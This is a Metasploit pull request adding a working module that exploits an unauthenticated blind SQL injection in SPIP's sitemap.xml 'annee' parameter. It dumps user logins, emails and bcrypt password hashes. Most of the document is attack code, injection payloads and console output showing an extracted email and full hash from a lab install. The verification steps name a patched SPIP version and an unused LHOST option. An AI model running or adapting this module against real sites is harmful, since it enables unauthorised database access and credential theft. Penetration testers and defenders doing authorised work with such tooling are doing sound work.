### PR TITLE
Add SPIP < 4.4.18 unauthenticated blind SQLi hash dump module

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/spip_annee_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/spip_annee_sqli.md
@@ -12,7 +12,9 @@ a value like `abs(99999)) UNION SELECT ...` via the `annee` GET parameter on
 the public `sitemap.xml` page, an attacker can execute arbitrary SQL.
 
 The module uses boolean-based blind injection with binary search to extract
-bcrypt password hashes from the `spip_auteurs` table.
+bcrypt password hashes from the `spip_auteurs` table. SQLite and MySQL database
+backends are supported and detected automatically. MySQL targets require at
+least one published article to provide a boolean response difference.
 
 Affected versions: SPIP < 4.4.18
 Fixed version: SPIP 4.4.18
@@ -65,6 +67,7 @@ msf auxiliary(scanner/http/spip_annee_sqli) > run
 [*] Running module against 127.0.0.1
 [*] SPIP Version detected: 4.4.9
 [*] Verifying blind SQLi via sitemap.xml annee parameter...
+[*] SQLite database detected
 [+] Blind SQLi confirmed!
 [*] Extracting user id_auteur=1...
 [+]   Login: jvoisin
@@ -83,5 +86,5 @@ msf auxiliary(scanner/http/spip_annee_sqli) > run
 [*] No user with id_auteur=4, skipping
 [*] No user with id_auteur=5, skipping
 [*] Auxiliary module execution completed
-msf auxiliary(scanner/http/spip_annee_sqli) > 
+msf auxiliary(scanner/http/spip_annee_sqli) >
 ```

--- a/documentation/modules/auxiliary/scanner/http/spip_annee_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/spip_annee_sqli.md
@@ -1,0 +1,87 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated blind SQL injection in SPIP < 4.4.18
+via the `annee` parameter on the public `sitemap.xml` page to extract login,
+email, and bcrypt password hashes from the `spip_auteurs` table.
+
+SPIP versions prior to 4.4.18 are affected by an unauthenticated blind SQL
+injection in the date column escaping logic. The `_sqlite_calculer_cite()` and
+`spip_mysql_cite()` functions skip SQL escaping for date-type columns when the
+value matches `/^\w+\(/` (intended for SQL functions like `NOW()`). By injecting
+a value like `abs(99999)) UNION SELECT ...` via the `annee` GET parameter on
+the public `sitemap.xml` page, an attacker can execute arbitrary SQL.
+
+The module uses boolean-based blind injection with binary search to extract
+bcrypt password hashes from the `spip_auteurs` table.
+
+Affected versions: SPIP < 4.4.18
+Fixed version: SPIP 4.4.18
+
+A vulnerable SPIP instance can be set up as follows:
+
+```
+wget https://files.spip.net/spip/archives/spip-v4.4.9.zip
+unzip spip-v4.4.9.zip -d spip-v4.4.9
+cd spip-v4.4.9
+php -S 127.0.0.1:8080
+```
+
+Then visit `http://127.0.0.1:8080/ecrire/` to complete the installation wizard
+(SQLite is easiest for testing). Create an admin account when prompted.
+
+## Verification Steps
+
+1. Install SPIP < 4.4.18
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/spip_annee_sqli`
+1. Do: `set RHOSTS [ip]`
+1. Do: `set RPORT [port]`
+1. Do: `run`
+1. You should see extracted login, email, and bcrypt password hash for each user.
+
+## Options
+
+### ID_AUTEUR
+
+The starting user ID to extract. SPIP assigns sequential IDs; the first admin
+created during installation is typically `id_auteur=1`. (Default: `1`)
+
+### MAX_USERS
+
+Maximum number of consecutive user IDs to attempt extraction for, starting from
+ID_AUTEUR. (Default: `5`)
+
+## Scenarios
+
+### SPIP 4.4.9 on Linux with SQLite
+
+```
+msf > use auxiliary/scanner/http/spip_annee_sqli
+msf auxiliary(scanner/http/spip_annee_sqli) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf auxiliary(scanner/http/spip_annee_sqli) > set RPORT 8080
+RPORT => 8080
+msf auxiliary(scanner/http/spip_annee_sqli) > run
+[*] Running module against 127.0.0.1
+[*] SPIP Version detected: 4.4.9
+[*] Verifying blind SQLi via sitemap.xml annee parameter...
+[+] Blind SQLi confirmed!
+[*] Extracting user id_auteur=1...
+[+]   Login: jvoisin
+[*]   [10] spip@dustr
+[+]   Email: spip@dustri.org
+[*]   Extracting password hash (this takes a moment)...
+[*]   [10] $2y$12$iR/
+[*]   [20] $2y$12$iR/qL5rAIPQtl
+[*]   [30] $2y$12$iR/qL5rAIPQtlVSuCQieK.b
+[*]   [40] $2y$12$iR/qL5rAIPQtlVSuCQieK.bobNJUdyMtn
+[*]   [50] $2y$12$iR/qL5rAIPQtlVSuCQieK.bobNJUdyMtniOxILWvT23
+[*]   [60] $2y$12$iR/qL5rAIPQtlVSuCQieK.bobNJUdyMtniOxILWvT23t9L7..LXxK
+[+]   Hash:  $2y$12$iR/qL5rAIPQtlVSuCQieK.bobNJUdyMtniOxILWvT23t9L7..LXxK
+[*] No user with id_auteur=2, skipping
+[*] No user with id_auteur=3, skipping
+[*] No user with id_auteur=4, skipping
+[*] No user with id_auteur=5, skipping
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/spip_annee_sqli) > 
+```

--- a/modules/auxiliary/scanner/http/spip_annee_sqli.rb
+++ b/modules/auxiliary/scanner/http/spip_annee_sqli.rb
@@ -1,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Spip
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SPIP Unauthenticated Blind SQLi via Date Field Escaping Bypass',
+        'Description' => %q{
+          This module exploits an unauthenticated blind SQL injection in
+          SPIP < 4.4.18. The SQL quoting function for date-type columns
+          skips escaping when the value matches /^\w+\(/ (intended for
+          NOW()). By passing a value like abs(X)) UNION SELECT ... in the
+          annee parameter of the public sitemap.xml page, an attacker can
+          inject arbitrary SQL.
+
+          The module uses boolean-based blind injection to extract bcrypt
+          password hashes from spip_auteurs. A UNION SELECT with a WHERE
+          condition produces 2 URLs in the sitemap on TRUE vs 1 on FALSE.
+        },
+        'Author' => [
+          'Benoit Hua',       # Vulnerability discovery
+          'ka3n1x',           # Vulnerability discovery
+          'Franck Chevalier', # Vulnerability discovery
+          'Julien Voisin'     # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-4-18.html']
+        ],
+        'DisclosureDate' => '2026-08-10',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options([
+      OptInt.new('ID_AUTEUR', [true, 'Target user ID to extract (1 = first admin)', 1]),
+      OptInt.new('MAX_USERS', [true, 'Maximum number of users to extract', 5])
+    ])
+  end
+
+  def sitemap_inject(annee_tail)
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'spip.php'),
+      'vars_get' => {
+        'page' => 'sitemap.xml',
+        'annee' => "abs(99999)) #{annee_tail}-- "
+      }
+    )
+  end
+
+  def run_host(_ip)
+    rversion = spip_version || spip_plugin_version('spip')
+    if rversion
+      print_status("SPIP Version detected: #{rversion}")
+      if rversion >= Rex::Version.new('4.4.18')
+        print_warning('Target appears patched (>= 4.4.18)')
+      end
+    end
+
+    baseline_res = sitemap_inject('UNION SELECT 1,2,3,4,5,6 FROM spip_auteurs WHERE 1=0')
+    fail_with(Failure::Unreachable, 'Target did not respond') unless baseline_res&.body
+
+    baseline_count = baseline_res.body.scan('<url>').length
+
+    @sqli = create_sqli(dbms: Msf::Exploit::SQLi::SQLitei::BooleanBasedBlind) do |payload|
+      res = sitemap_inject("UNION SELECT 1,2,3,4,5,6 FROM spip_auteurs WHERE #{payload}")
+      next false unless res&.body
+
+      res.body.scan('<url>').length > baseline_count
+    end
+
+    print_status('Verifying blind SQLi via sitemap.xml annee parameter...')
+    unless @sqli.test_vulnerable
+      fail_with(Failure::NotVulnerable, 'Boolean blind SQLi test failed')
+    end
+    print_good('Blind SQLi confirmed!')
+
+    max_users = datastore['MAX_USERS']
+    start_id = datastore['ID_AUTEUR']
+
+    (start_id..(start_id + max_users - 1)).each do |uid|
+      unless @sqli.blind_request("(SELECT COUNT(*) FROM spip_auteurs WHERE id_auteur=#{uid})=1")
+        print_status("No user with id_auteur=#{uid}, skipping")
+        next
+      end
+
+      login = @sqli.run_sql("(SELECT login FROM spip_auteurs WHERE id_auteur=#{uid})")
+      print_good("  Login: #{login}")
+
+      email = @sqli.run_sql("(SELECT email FROM spip_auteurs WHERE id_auteur=#{uid})")
+      print_good("  Email: #{email}")
+
+      print_status('  Extracting password hash (this takes a moment)...')
+      pass = @sqli.run_sql("(SELECT pass FROM spip_auteurs WHERE id_auteur=#{uid})")
+      print_good("  Hash:  #{pass}")
+
+      report_cred(login, pass) unless pass.to_s.empty?
+    end
+  end
+
+  def report_cred(login, hash)
+    credential_data = {
+      module_fullname: fullname,
+      workspace_id: myworkspace_id,
+      username: login,
+      private_data: hash,
+      private_type: :nonreplayable_hash,
+      jtr_format: 'bcrypt',
+      origin_type: :service,
+      address: rhost,
+      port: rport,
+      protocol: 'tcp',
+      service_name: (ssl ? 'https' : 'http')
+    }
+    create_credential(credential_data)
+  end
+end

--- a/modules/auxiliary/scanner/http/spip_annee_sqli.rb
+++ b/modules/auxiliary/scanner/http/spip_annee_sqli.rb
@@ -63,6 +63,23 @@ class MetasploitModule < Msf::Auxiliary
     )
   end
 
+  def sqlite_sqli(baseline_count)
+    create_sqli(dbms: Msf::Exploit::SQLi::SQLitei::BooleanBasedBlind) do |payload|
+      res = sitemap_inject("UNION SELECT 1,2,3,4,5,6 FROM spip_auteurs WHERE sqlite_version() IS NOT NULL AND (#{payload})")
+
+      res.body.scan('<url>').length > baseline_count
+    end
+  end
+
+  def mysql_sqli(baseline_count)
+    create_sqli(dbms: Msf::Exploit::SQLi::MySQLi::BooleanBasedBlind) do |payload|
+      res = sitemap_inject("OR (#{payload})")
+      next false unless res&.body
+
+      res.body.scan('<url>').length > baseline_count
+    end
+  end
+
   def run_host(_ip)
     rversion = spip_version || spip_plugin_version('spip')
     if rversion
@@ -77,16 +94,15 @@ class MetasploitModule < Msf::Auxiliary
 
     baseline_count = baseline_res.body.scan('<url>').length
 
-    @sqli = create_sqli(dbms: Msf::Exploit::SQLi::SQLitei::BooleanBasedBlind) do |payload|
-      res = sitemap_inject("UNION SELECT 1,2,3,4,5,6 FROM spip_auteurs WHERE #{payload}")
-      next false unless res&.body
-
-      res.body.scan('<url>').length > baseline_count
-    end
-
     print_status('Verifying blind SQLi via sitemap.xml annee parameter...')
-    unless @sqli.test_vulnerable
-      fail_with(Failure::NotVulnerable, 'Boolean blind SQLi test failed')
+    sqli = sqlite_sqli(baseline_count)
+    if sqli.test_vulnerable
+      print_status('SQLite database detected')
+    else
+      sqli = mysql_sqli(baseline_count)
+      fail_with(Failure::NotVulnerable, 'Boolean blind SQLi test failed; MySQL targets require at least one published article') unless sqli.test_vulnerable
+
+      print_status('MySQL database detected')
     end
     print_good('Blind SQLi confirmed!')
 
@@ -94,19 +110,19 @@ class MetasploitModule < Msf::Auxiliary
     start_id = datastore['ID_AUTEUR']
 
     (start_id..(start_id + max_users - 1)).each do |uid|
-      unless @sqli.blind_request("(SELECT COUNT(*) FROM spip_auteurs WHERE id_auteur=#{uid})=1")
+      unless sqli.blind_request("(SELECT COUNT(*) FROM spip_auteurs WHERE id_auteur=#{uid})=1")
         print_status("No user with id_auteur=#{uid}, skipping")
         next
       end
 
-      login = @sqli.run_sql("(SELECT login FROM spip_auteurs WHERE id_auteur=#{uid})")
+      login = sqli.run_sql("(SELECT login FROM spip_auteurs WHERE id_auteur=#{uid})")
       print_good("  Login: #{login}")
 
-      email = @sqli.run_sql("(SELECT email FROM spip_auteurs WHERE id_auteur=#{uid})")
+      email = sqli.run_sql("(SELECT email FROM spip_auteurs WHERE id_auteur=#{uid})")
       print_good("  Email: #{email}")
 
       print_status('  Extracting password hash (this takes a moment)...')
-      pass = @sqli.run_sql("(SELECT pass FROM spip_auteurs WHERE id_auteur=#{uid})")
+      pass = sqli.run_sql("(SELECT pass FROM spip_auteurs WHERE id_auteur=#{uid})")
       print_good("  Hash:  #{pass}")
 
       report_cred(login, pass) unless pass.to_s.empty?


### PR DESCRIPTION
## Description

Adds modules/auxiliary/scanner/http/spip_annee_sqli.rb which exploits a blind SQL injection in SPIP's date column escaping logic. The SQL quoting function skips escaping when the value matches /^\w+\(/, allowing injection via the annee parameter on the public sitemap.xml page.

Uses boolean-based blind extraction (UNION producing 2 vs 1 URL tags) with binary search to dump bcrypt password hashes from spip_auteurs.

## Breaking Changes

<!-- Does this PR change existing behavior, remove options, rename datastore settings, or alter API/mixin interfaces? If yes, describe what breaks and how users should adapt. Write "None" if not applicable. -->

None

## Reviewer Notes

<!-- (Optional) Guide the reviewer: where to start reading, what the key change is, what's intentionally left out or deferred. Delete this section if not needed. -->

## Verification Steps

<!-- Provide specific, numbered steps a reviewer can follow to verify this change works as intended. At least one step must describe the expected observable outcome. Generic steps such as "verify it works" will result in the PR being closed. -->

1. - [x] Download Spip via wget https://files.spip.net/spip/archives/spip-v4.4.19.zip
1. - [x] Run php -S 127.0.0.1:8080
1. - [x] Open http://127.0.0.1:8080/ecrire to install Spip, feel free to use sqlite as backen
1. - [x] use auxiliary/scanner/http/spip_annee_sqli
1. - [x] set RHOSTS 127.0.0.1
1. - [x] set LHOST 127.0.0.1
1. - [x] set RPORT 8080
1. - [x] Get a password dump, woo!

## Test Evidence
```                                                                            
msf > use auxiliary/scanner/http/spip_annee_sqli                               
msf auxiliary(scanner/http/spip_annee_sqli) > set RHOSTS 127.0.0.1             
RHOSTS => 127.0.0.1                                                            
msf auxiliary(scanner/http/spip_annee_sqli) > set RPORT 8080                   
RPORT => 8080                                                                  
msf auxiliary(scanner/http/spip_annee_sqli) > run                              
[*] Running module against 127.0.0.1                                           
[*] SPIP Version detected: 4.4.9                                               
[*] Verifying blind SQLi via sitemap.xml annee parameter...                    
[+] Blind SQLi confirmed!                                                      
[*] Extracting user id_auteur=1...                                             
[+]   Login: jvoisin                                                           
[*]   [10] spip@dustr                                                          
[+]   Email: spip@dustri.org                                                   
[*]   Extracting password hash (this takes a moment)...                        
[*]   [10] $2y$12$iR/                                                          
[*]   [20] $2y$12$iR/qL5rAIPQtl                                                
[*]   [30] $2y$12$iR/qL5rAIPQtlVSuCQieK.b                                      
[*]   [40] $2y$12$iR/qL5rAIPQtlVSuCQieK.bobNJUdyMtn                            
[*]   [50] $2y$12$iR/qL5rAIPQtlVSuCQieK.bobNJUdyMtniOxILWvT23                  
[*]   [60] $2y$12$iR/qL5rAIPQtlVSuCQieK.bobNJUdyMtniOxILWvT23t9L7..LXxK        
[+]   Hash:  $2y$12$iR/qL5rAIPQtlVSuCQieK.bobNJUdyMtniOxILWvT23t9L7..LXxK      
[*] No user with id_auteur=2, skipping                                         
[*] No user with id_auteur=3, skipping                                         
[*] No user with id_auteur=4, skipping                                         
[*] No user with id_auteur=5, skipping                                         
[*] Auxiliary module execution completed                                       
msf auxiliary(scanner/http/spip_annee_sqli) >                                  
```            
                                                                
## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Fedora <!-- e.g., Ubuntu 22.04, Windows 11, macOS 14.2 --> |
| **Target Software/Hardware** | Spip 4.4.9 <!-- Name and version of the software or hardware targeted by this change --> |
| **Docker Image / Vagrant Setup** | <!-- (Optional) Image name or setup instructions if applicable, otherwise remove this row --> |

## AI Usage Disclosure

<!-- Was AI used in the creation of this PR? If so, describe what tools were used and how (e.g., code generation, documentation drafting, test writing). Write "None" if no AI tools were used. -->

None

## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [ ] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)

<!-- After the PR has been submitted, check on the GitHub Actions status and review the job for any failures (red-X marks). Resolve these issues as they will be flagged by review. -->

<details>
<summary>Hardware and Complex Software Module Guidance</summary>

If your module targets specialized hardware (routers, IoT, PLCs, etc.) or complex software (licensed, multi-service, or multi-version), provide a pcap, screen recording, or video showing successful execution.

Email sanitized pcaps/recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com) — remove real IPs, credentials, and hostnames before sending. If hardware/software is unavailable, explain in the PR description.

</details>

<details>
<summary>Responsiveness and PR Takeover Policy</summary>

We want every contribution to make it into the project. If approximately 2 weeks pass after a review request without a comment or code update from you, the team may take over the PR and complete the work on your behalf.

If this happens, you will remain credited as a co-author on the final commit — your contribution is always recognized.

This policy exists to keep the project moving forward. It is not a reflection on the quality of your work or your involvement. Life happens, and we would rather finish the work together than let a good contribution go stale.

</details>
